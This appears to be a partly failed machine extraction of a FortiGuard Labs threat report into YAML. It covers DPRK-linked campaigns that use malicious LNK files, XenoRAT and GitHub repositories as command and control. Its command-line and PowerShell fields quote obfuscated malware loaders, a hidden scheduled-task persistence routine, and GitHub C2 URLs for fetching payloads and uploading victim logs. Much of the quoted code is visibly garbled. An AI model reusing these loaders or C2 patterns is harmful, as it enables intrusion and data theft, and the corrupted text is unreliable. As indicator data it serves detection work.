# Failed YAML extraction
# Timestamp: 2026-05-01T17:14:37.796916
# Response length: 5182 chars
# Input chunk preview: '=== ARTICLE BODY ===FortiGuard Labs Threat ResearchDPRK-Related Campaigns with LNK and GitHub C2How DPRK actors use LNK files and GitHub C2 to evade detection and maintain persistenceFortiGuard Securi'
# ============================================================

title: "DPRK-Related Campaigns with LNK and GitHub C2"
description: DPRK actors use LNK files and GitHub as Command and Control (C2) infrastructure to evade detection and maintain persistence.
attribution: ""
malware_families:
  - XenoRAT
cves: []
ttps:
  processes:
    - powershell.exe
    - wscript.exe
  command_lines:
    - "$VIUSBvejbawf = \"142 99 115 37 136 66 90 101 94 165 98 106 103 37 165 100 110 123 107 94 74 110 161 83 (omit) 87 107 103 151\";$Length = $VIUSBvejbawf.Length;$CLOIISFYSystem.Collections.ArrayList;[string] $date = $null;$m = @;for($k = @; $k -lt $Length$VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \" \"){[void]$CLOIISfgiojvosef235sdb.Add($null);continue; }}$Apkengsidefg = \"Kdt& %bgek\";[Byte[]]$pw =[System.Text.Encoding]::UTF8.GetBytes(\"$Apkengsidefg\");$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]({= @;for($i = @; $i -lt $CLOIISfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;$CLOIISFgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num -$CLOIISFgiojvosef235sg$pw_Length){$j = @;}}$aqqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg234\"$env:appdata\firefox.ps1\";$qqpvm|Out-File -FilePath $fgfw98IHGVFfeg;powershell -wilBypass $fgfw98IHGVfeg;"
    - "$j3 = Get-Location; $Ygh = Join-Path $j3 ('Technical PapChain.pdf.1nk'); $KQD = $env:TEMP; if (-not(Test-Path $gh)) { $Nx2 = Get-ChildItem $|ERrOraCTIoN SILeNtLyConTinuE | where-ObJEct { $_.nAmE -eQ 'Technical Paper for Creata ChasoRt-obJECt 1ASTWRATEtIME -DEsCendInG | Select-Object -FIrsT 1; If ($Nx2) { $Ygh = $N|else { exit; } }; function pl { param($nW, $3jB, $EG, $zNo) $LT = New-Object B$Nm = [System.IO.File]::OpenRead($Ygh); $Nm.Seek($nW, [System.IO.SeekOrigin]::BEGIN);0, $jB); $Nm.Close(); FOR ($Ci = @; $Ci -lt $3jB; $Ci++) { SLT[$Ci] = $LT[}; Set-Content $zN@ $LT -Encoding Byte; }; $jp = Join-Path $KQD ('Technical Paper forChain.pdf'); pl 8192 1965784 157 $jp; & $jp; $IV = Join-Path $KQD ([System.IO.Path]::GetR'.psl'); pl 1973976 7300 100 $IV; powershell -noprofile -windowstyle hidden -executionpol$3V; Remove-Item -Path $IV -Force;"
    - "powershell -WindowStyle Hidden -nop -NonInteractive -NgExecutionPolicy Bypass -Command \"& {$abc = Join-Path ($env:AppData) \\chrome.ps1\\; & $abc;}\""
  powershell:
    - "$action = New-ScheduledTaskAction -Execute 'wscript.exe' -Argument ('"' + $vbsFilePath + '"'); $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName \"Technical Paper for Creata Chain Task S-1-12-3-1231241245BVSKLERh-SD234GHSI56\" -Action $action -Trigger $trigger -Settings $settings"
    - "function wi { SygxaquachaBebl = @((\"(@)(2)\" -F \"vmune',t\"), ([string]::Format((a)(2)(2)(2)\",\"vi, UG F unse, ), S Saind alsinkec Totharareap) [<(Sec{int 5,146e g andsc-1e38) ([ char] (65 (he- 65174200 a5 4057 amdc Aeszay([eha (57 (5 $7- )37}(LcharJsey, Com'=rret = 13ty )y, CEINEIGIET b or e  ). 0JointLogentTothararr g (s 1t 14 3444 g anater1ese)(Lcha (o {(her 4312y Sy pe1serhCferges7 amisc-Lerza)([char) o7=C(be- 5713 S0 el ehar eI, ({01 < 1o ) 8ofocharisray O {8c=[in 155 scgees-mscTese)([car] (5 (5c-25072) 520 el g 1ee o e o e T T e R T e so 33y (oteog] rarman (03101 e By L33 ol kLo ee N kot NN S it N i gI, 0 a1 ) s OO I o ee"
    - "function pl { param($nW, $3jB, $EG, $zNo) $LT = New-Object B$Nm = [System.IO.File]::OpenRead($Ygh); $Nm.Seek($nW, [System.IO.SeekOrigin]::BEGIN);0, $jB); $Nm.Close(); FOR ($Ci = @; $Ci -lt $3jB; $Ci++) { SLT[$Ci] = $LT[}; Set-Content $zN@ $LT -Encoding Byte; };"
  scripts:
    - "{[Text.Encoding]::UTF8.GetString(...)}"
  registry_keys: []
  image_loads: []
  network_connections:
    - "powershell.exe -> hxxps://api[.]github[.]com/repos/motoralis/singled/contents/kcca/technik"
    - "wscript.exe -> hxxps://raw[.]githubusercontent[.]com/motoralis/singled/main/kcca/paper[.]jim"
    - "powershell.exe -> hxxps://api[.]github[.]com/repos/motoralis/singled/contents/jjyun/network/<Date>_<Time>-<IP_Address>-Real.log"
  file_activity:
    - "$env:appdata\firefox.ps1"
    - "$env:TEMP\Technical Paper forChain.pdf"
    - "$env:TEMP\3F=C|X|2&AF|0|FISTYCHES/PNE-N pdf"
    - "$env:AppData\chrome.psl"
    - "$env:AppData\temp.psl"
  persistence:
    - "Scheduled Task (Technical Paper for Creata Chain Task S-1-12-3-1231241245BVSKLERh-SD234GHSI56) pointing to a VBScript that executes the PowerShell payload in a hidden window"
  process_relations: []
iocs:
  hashes:
    - 9c3f2bd300ad2ef8584cc48adc47aab61bf85fc653d923e106c73fc6ec3ea1dc
    - f20fde3a9381c22034f7ecd4fef2396a85c05bfd54f7db3ad6bcd00c9e09d421
    - 484a16d779d67c7339125ceac10b9abf1aa47f561f40058789bfe2acda548282
    - c0866bb72c7a12a0288f434e16ba14eeaa35d3c4cff4a86046c553c15679c0b5
  ip_addresses: []
  domains:
    - github[.]com
  urls:
    - hxxps://api[.]github[.]com/repos/motoralis/singled/contents/kcca/technik
    - hxxps://raw[.]githubusercontent[.]com/motoralis/singled/main/kcca/paper[.]jim
    - hxxps://api[.]github[.]com/repos/motoralis/singled/contents/jjyun/network/<Date>_<Time>-<IP_Address>-Real.log
authors:
  - FortiGuard Labs